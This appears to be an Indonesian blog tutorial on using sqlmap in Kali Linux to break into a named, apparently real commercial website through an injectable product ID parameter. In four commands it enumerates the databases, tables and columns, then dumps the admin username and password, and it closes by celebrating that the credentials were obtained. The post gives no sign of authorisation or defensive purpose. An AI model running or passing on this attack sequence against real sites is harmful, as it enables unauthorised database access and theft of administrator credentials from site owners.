Hacking Website dengan SQLMap di Kali Linux

target "http://www.solutionpack.my/products.php?id=9"
1. buka termnal…


2. inilah perbedaannya danga backtrack, kita tidak harus menuju folder sqlmap terlebih dahulu untuk menjalankanya tetapi langsung kita ketikkan perintah berikut :

root@maverick#sqlmap -u http://www.solutionpack.my/products.php?id=9 --dbs


3. terlihat ada 2 database :
[*] information_schema
[*] solution_newgads

selanjutnya kita cari tabel yang ada di database solution_newgads

dengan perintah

root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads --tables

4. akan muncul nama-nama kolom dari database tersebut, lalau kita cari isi kolom yang berisi username dan password admin…dengan perinth berikut
  
root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads -T admin --columns
5. untuk melihat isi dari kolom dari username dan pasword tersebut tuliskan perintah:

root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads -T admin -C  username,password --dump















selesai sudah kita dapatkan username dan password website nya


Comments

Popular posts from this blog

kumpulan game ps1 high compresed

ISTILAH ISTILAH TELKOM

how to solving KVM permission denied in GNS3 linux